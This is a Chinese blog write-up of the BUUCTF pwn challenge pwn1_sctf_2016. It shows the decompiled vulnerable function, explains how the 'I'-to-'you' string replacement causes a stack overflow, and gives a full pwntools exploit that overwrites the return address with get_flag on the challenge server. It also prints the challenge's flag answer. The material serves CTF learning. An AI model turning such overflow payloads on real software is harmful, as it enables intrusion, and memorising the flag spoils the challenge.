CTF-PWN-buuctf-pwn1_sctf_2016-CPP的字符串替换

最新推荐文章于 2023-05-11 12:24:05 发布
最新推荐文章于 2023-05-11 12:24:05 发布
阅读量465 收藏 1
点赞数
分类专栏: CTF-PWN 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_37157335/article/details/124173774
版权

CTF-PWN

来源:https://buuoj.cn/challenges

内容

附件:https://pan.baidu.com/s/1bSrSQZYWkBIWCXP5Lsq7sg?pwd=mpgo 提取码:mpgo

答案:flag{714a8f91-7e24-440c-8cc6-1f2d26adbcec}

总体思路

发现get_flag的位置

发现输入会被替换,构造exp

详细步骤

  • 查看文件信息

    • image-20220414153508156

  • 查看题目发现是将用户输入的I替换为you,虽然输入的时候只允许输入32位,但是因为替换会导致1位变3位,从而可以造成溢出

    • int vuln()
{
  const char *v0; // eax
  char s[32]; // [esp+1Ch] [ebp-3Ch] BYREF
  char v3[4]; // [esp+3Ch] [ebp-1Ch] BYREF
  char v4[7]; // [esp+40h] [ebp-18h] BYREF
  char v5; // [esp+47h] [ebp-11h] BYREF
  char v6[7]; // [esp+48h] [ebp-10h] BYREF
  char v7[5]; // [esp+4Fh] [ebp-9h] BYREF

  printf("Tell me something about yourself: ");
  fgets(s, 32, edata);
  std::string::operator=(&input, s);
  std::allocator<char>::allocator(&v5);
  std::string::string(v4, "you", &v5);
  std::allocator<char>::allocator(v7);
  std::string::string(v6, "I", v7);
  replace((std::string *)v3);
  std::string::operator=(&input, v3, v6, v4);
  std::string::~string(v3);
  std::string::~string(v6);
  std::allocator<char>::~allocator(v7);
  std::string::~string(v4);
  std::allocator<char>::~allocator(&v5);
  v0 = (const char *)std::string::c_str((std::string *)&input);
  strcpy(s, v0);
  return printf("So, %s\n", s);
}

    • operator=是等号操作符的重载符,可以理解为:

      std::string::operator=(&input, s); // &input = s;
std::string::operator=(&input, v3, v6, v4); // &input = v3(v6,v4);

  • 看到从sinput)到返回地址的栈长度是60+4

    • image-20220414152807388

  • 通过pwntool的e.symbols['get_flag']获取函数的地址

  • 故exp为

    • import struct
import sys
import pwn
import os
enable_use_randoms = True


def use_randoms(length: int, char: chr = None):
    if not enable_use_randoms or char:
        if not char:
            char = 'a'
        return char * length
    return pwn.randoms(length, pwn.string.ascii_letters)


def start_process(target: str):
    os.system(f'chmod 777 {target}')
    p = pwn.process(target)
    return p


target: str = './target'

e = pwn.ELF(target)
get_flag = e.symbols['get_flag']
addr_system = get_flag
# pwn.context.terminal = ['term','splitw','-b']
# p = start_process(target)
p = pwn.remote('node4.buuoj.cn', 29641)


padding_rbp = use_randoms(44)
junk_r = use_randoms(0)

v_addr_system = pwn.p64(addr_system)
padding_char_replace = use_randoms(20, 'I')  # 将会被程序替换为3个字符
padding_char_left = use_randoms(4, 'a')
padding_rbp = padding_char_replace + padding_char_left

payload = (padding_rbp+junk_r).encode('ascii') + v_addr_system

print(payload)
# print(p.recvuntil('>'))
p.sendline(payload)
# p.sendline('ls')
p.interactive()

参考文档

serfend
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
c++实现的字符串替换功能
04-25
使用c++写的字符串替换函数,可以完成字符串替换功能
c/cpp实现字符串替换
sdhdsf132452的博客
11-03 641
代码: #include<stdio.h> #include<iostream> using namespace std; void my_strcpy(char * destination,char * source){ for (int i =0; i<80; i++){ destination[i] = source[i]; // 将dest对应位置修改 if (source[i]==' '){ ...
C++ 中字符串查找、字符串截取、字符串替换
qq_21909049的博客
07-31 1532
参照:C++基础-string截取、替换、查找子串函数 1、字符串查找 s.find(s1) //查找s中第一次出现s1的位置,并返回(包括0) s.rfind(s1) //查找s中最后次出现s1的位置,并返回(包括0) s.find_first_of(s1) //查找在s1中任意一个字符在s中第一次出现的位置,并返回(包括0) s.find_last_of(s1) //查找在s1中任意一个字符在s中最后一次出现的位置,并返回(包括0)
c++ 字符串替换replace函数
qq_26309545的博客
05-11 2027
由于c++中的replace函数只能替换一次字符串中的字符/子串,所有需要通过循环遍历方式,多次替换。//并重新从新的起始位置pos进行find , src.find(old_value, pos)else break;//已经找不到需要替换字符串了,break掉。// 每次重新定位起始位置pos += new_value.length(),//防止上轮替换后的字符串形成新的old_value。
C++ 字符串替换方法
yuff0408的专栏
01-27 1万+
 今天同学问到C++的一个问题:“ 将字符串%abv%a中的%a 替换掉,将字符串变为cbvc”,之前没整过这个,想到应该相应的函数吧。到网上一查:可以使用字符串的Replace函数,具体说明如下:CString::Replaceint Replace( TCHAR chOld, TCHAR chNew );int Replace( LPCTSTR lpszOld, LPCTSTR
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成,例如Web安全、二...
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
0ctf-2017-pwn-char
02-05
2017年0ctfpwn题,题目质量还是非常高的,要求做题人需要扎实的shellcode编写能力和ROP链构造能力,下面给出wp链接:https://blog.csdn.net/A951860555/article/details/113666423
0ctf-2017-pwn-char-libc.so
02-05
2017年0ctfpwn题char的libc库文件
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
C++中string替换所有指定字符串的方法
08-19
主要介绍了C++中string替换所有指定字符串的实例代码,本文通过实例代码给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友可以参考下
Converter编码转换CTF比赛用
07-12
Converter编码替换,一个用来转换字符编码的工具,可用于CTF比赛
c++ 字符串替换
Work Hard, Play Harder!
09-29 1413
字符串的空格替换为%20 we are happy. we%20are%20happy. // 复杂度O(n),从后向前的移动 // str4.cpp : 定义控制台应用程序的入口点。 // #include "stdio.h" #include "stdlib.h" #include "iostream" using namespace std; void re
CTF---Web---SQL注入---06---tables关键字替换
qq_22160557的博客
07-31 481
文章目录前言一、题目描述二、解题步骤1.2.3.三、总结 前言 题目分类: CTF—Web—SQL注入—0 一、题目描述 题目:新闻搜索 二、解题步骤 1. 2. 3. 三、总结 1、 参考链接:
[第五空间2019 决赛]PWN5 (字符串漏洞)——两种解法
qq_41696518的博客
07-13 2530
[第五空间2019 决赛]PWN5 ——两种解法
【C++】STL — string的使用 + 模拟实现
上上谦. 的博客
09-02 1108
STL是(standard template libaray-标准模板库)的首字母缩写,是C++标准库的重要组成部分,不仅是一个可复用的组件库,而且是一个包罗数据结构与算法的软件框架。成员函数中层层调用、相互复用,封装在一个类当中,极大地考察了我们之前学的类和对象和C++各种语法,需要大家细心 + 谨慎。但行好事莫问前程,欲戴皇冠必承其重,我们在路上,努力且不放弃……
今天你pwn了吗(上)
蚁景网安学院
05-07 3984
前言:"二进制太难了", 一起到 buu 开始 刷题吧。这里 仅记录 下 非高分题目的 解题思路和 知识讲解。特别是文章里的函数,我特意整理了下,还请好好学习下。test...
C++ std::string用法总结
热门推荐
Gabriel的专栏
08-17 2万+
转自:http://blog.csdn.net/lanyzh0909/article/details/6957649
C++ 字符串替换
C++
10-16 3699
C++ 替换字符串的字符
ctf竞赛权威指南pwn篇 pdf
最新发布
11-05
CTF竞赛权威指南Pwn篇》是一本关于CTF(Capture The Flag)竞赛中的Pwn(利用漏洞攻击代码)题目的权威指南。CTF竞赛是一种网络安全竞赛形式,旨在通过解决各种安全相关的难题来锻炼和提高参赛者的技能。 Pwn篇是该指南中的一个部分,专注于讲解和指导参赛者在CTF竞赛中解决Pwn题目的技巧和方法。Pwn题目会提供一个有漏洞的程序,并要求参赛者利用该漏洞实现攻击,获取对程序的控制权。这需要参赛者具备熟悉各种漏洞类型、编程知识和逆向工程技术的能力。 《CTF竞赛权威指南Pwn篇》通过详细的讲解和示例,帮助读者理解Pwn题目的背景和思路,介绍了与Pwn相关的常见漏洞类型、攻击技巧和工具。该指南提供了从基础到高级的学习路径,帮助读者逐步掌握和提升解决Pwn题目的能力。 该指南还强调了CTF竞赛的实践性和团队协作的重要性。在解析题目和攻击代码的过程中,读者需要灵活运用自己的知识和思维,善于发现和利用漏洞,同时与团队成员合作,进行漏洞挖掘和漏洞利用。 总之,《CTF竞赛权威指南Pwn篇》是一个帮助读者深入了解Pwn题目并提升解决能力的重要指南。通过学习该指南,读者可以更好地参与CTF竞赛,并在解决Pwn题目时展现出自己的技术实力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值